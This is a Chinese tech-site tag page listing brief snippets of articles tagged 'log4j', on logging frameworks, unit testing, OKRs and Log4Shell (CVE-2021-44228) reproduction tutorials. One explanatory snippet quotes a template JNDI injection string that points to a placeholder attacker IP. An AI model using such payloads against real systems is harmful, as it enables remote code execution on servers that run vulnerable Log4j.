技术栈
log4j
Jzhoucdc
5 天前
渗透测试
·
log4j
log4jshell CVE-2021-44228 复现
Log4j 是 Apache 提供的一个非常流行的 Java 日志框架。漏洞编号 CVE‑2021‑44228,就被称作 “Log4Shell”,该漏洞存在于 Log4j 2 版本(从 2.0‑beta9 到 2.14.1)中,因为其日志处理机制中对 JNDI(Java 命名与目录接口)查找没有做限制或验证。攻击者只要向日志字段输入恶意 JNDI 字符串(例如 ${jndi:ldap://攻击者IP/对象}),Log4j 就会去远端服务器加载 Java 对象,从而导致 远程代码执行(RCE)
leo__520
6 天前
log4j
Logic Error: 如何识别和修复逻辑错误
逻辑错误是指程序中的代码在语法上是正确的,但在执行时没有按预期工作。这种错误可能导致程序输出错误的结果或行为异常。逻辑错误通常比语法错误更难检测,因为它们不会产生编译或解释错误。本文将详细介绍如何识别和修复逻辑错误。
Poppy .^0^
6 天前
单元测试
·
log4j
·
maven
Maven 项目单元测试实战指南:从环境搭建到问题排查全解析
目录一、Maven 单元测试环境基础:配置与规范1. 依赖配置:pom.xml 核心代码(复制即用)2. 目录规范:必须遵守的 “约定优于配置”
云雾J视界
7 天前
log4j
·
谷歌
·
敏捷开发
·
okr
·
技术债
技术债视角下的OKR:谷歌如何以敏捷迭代实现“分期付款”
在当代技术团队的管理实践中,OKR(目标与关键结果)与敏捷开发已成为两大核心体系。 OKR强调聚焦与优先级,通过设定季度目标(O)与量化关键结果(KR)为团队指引方向;敏捷则以“快速响应变化”为灵魂,借助短周期迭代(Sprint)持续交付业务价值。 两者在落地中常发生冲突:为追求OKR的短期业务成果,团队往往不得已采取“先上线、后优化”的策略,致使技术债不断累积。 而技术债所带来的系统僵化、缺陷增多及迭代迟缓,又会反过来阻碍OKR的达成,形成恶性循环。
杨杨杨大侠
10 天前
java
·
spring
·
log4j
第3篇:配置管理的艺术 - 让框架更灵活
在前一章中,我们设计了强大的注解API。本章将深入探讨配置管理系统的设计,学习如何将注解中的声明式配置转换为运行时可用的配置对象。
若行若冲
11 天前
单元测试
·
log4j
·
maven
·
intellij-idea
·
lombok
Idea中 lombok 在“测试类中-单元测试”运行失败及解决方法
再次单元测试,成功!
慌糖
12 天前
log4j
发版混乱怎么规范
你是否经历过这种场景:临到发版,一堆功能代码挤在一起,测试分不清范围,修复一个Bug可能引发三个新Bug?发布过程像一场豪赌?
EndingCoder
15 天前
开发语言
·
前端
·
javascript
·
log4j
·
测试
·
全栈
·
next.js
测试 Next.js 应用:工具与策略
Next.js 作为一个基于 React 的全栈框架,在构建复杂 Web 应用时,测试是确保代码质量、功能稳定性和用户体验的关键步骤。测试可以分为单元测试、集成测试和端到端测试三种类型,每种类型针对不同的层面:单元测试验证单个组件或函数;集成测试检查模块间的交互;端到端测试模拟用户行为,验证整个应用流程。通过这些测试策略,开发者可以及早发现 bug、减少回归问题,并提升应用的可靠性和可维护性。
zru_9602
18 天前
spring boot
·
单元测试
·
log4j
Spring Boot 单元测试:@SpyBean 使用教程
@SpyBean 是 Spring Boot Test 提供的一个注解,用于在单元测试中**部分模拟(Partial Mock)**一个 Spring Bean。它类似于 Mockito 的 @Spy,但专门用于 Spring 容器中的 Bean。
潇凝子潇
1 个月前
java
·
开发语言
·
log4j
面条式代码(Spaghetti Code)
面条式代码(Spaghetti Code)是一种编程风格,其特点是代码结构混乱、逻辑不清晰,像是一团杂乱无章的面条。这种代码往往缺乏清晰的模块划分和层次结构,使得维护和扩展变得异常困难。 这种代码通常具有以下特征: • 缺乏清晰的模块化结构 • 过度使用goto语句或类似的跳转结构 • 控制流复杂且难以追踪 • 函数/方法过长且职责不单一 • 变量命名随意且作用域混乱 面条式代码的弊端
MediaTea
1 个月前
开发语言
·
python
·
log4j
Python 库手册:doctest 文档测试模块
doctest 是 Python 内置的测试模块,它能提取文档字符串(docstring)中的交互式示例,并自动运行这些示例以验证它们是否按预期工作。换言之,它将 Python 文档中的示例代码当作测试用例来运行,确保文档与实现保持一致。
EumenidesJ
1 个月前
java
·
log4j
·
logback
·
slf4j
Java常用日志框架介绍
Java提供了很多第三方的日志框架可供使用,按照现在的设计理念,一般把日志框架分成门面(Facade)部分和具体实现(Implementation)部分,门面(Facade)提供了抽象的api规范,实现(Implementation)负责实现api完成具体的日志记录功能。开发者在使用日志框架时使用的是门面提供的api,可以根据实际情况灵活的选择不同的api实现。
haonuy*
1 个月前
log4j
·
教程
·
漏洞复现
·
cve-2021-44228
Log4j CVE-2021-44228 漏洞复现详细教程
我们需要用到vulhub如果没有的可以自行下载一下,然后执行下列命令即可开启,然后就可以访问啦在我们点击页面时,可以发现URL中有界面会出现/solr/admin/cores?action=的传参点,我们这验证一下是否存在漏洞,使用dnslog.cn网站生成域名在前面带上我们构造的存在JNDI的请求发过去。就可以得到回显,说明漏洞存在。
XF小冯
1 个月前
log4j
Log4j2漏洞vul-hub通关教程
1.首先我们来到我们的来到靶场这里博主是在自己的vps上面docker上面搭接的vul-hub启动环境输入我们的命令:
sevevty-seven
2 个月前
数据库
·
redis
·
log4j
Redis 事务错误处理机制与开发应对策略
Redis 中的事务由以下三组命令构成:Redis 并非关系型数据库,不支持自动回滚机制,事务中命令出错后的表现如下:
Ziegler Han
2 个月前
java
·
log4j
·
slf4j
Java的Gradle项目,使用SLF4J+Log4j2+log4j2.xml
Java的Gradle项目,使用SLF4J+Log4j2+log4j2.xml注意:以上依赖和版本要一致,不然会导致日志输出错误
杨DaB
2 个月前
学习
·
spring
·
servlet
·
log4j
【项目实践】SMBMS(Javaweb版)汇总版
设计ER图,考虑需求逻辑,设计表结构,一般格式使用utf8。确定使用的数据库,安装MySQL。navicat或Dbeaver 操作数据库。
fire-flyer
2 个月前
java
·
spring boot
·
spring
·
log4j
·
logging
Spring Boot 源码解析之 Logging
logging初始化流程总览:Spring Boot 的日志系统抽象目标:✔️ 极早期可用:SpringApplication 启动前就能生效 ✔️ 自动探测:按 classpath 自动选择 logback、log4j2、jul ✔️ 可插拔:支持外部定制实现 ✔️ 统一配置:application.properties / yaml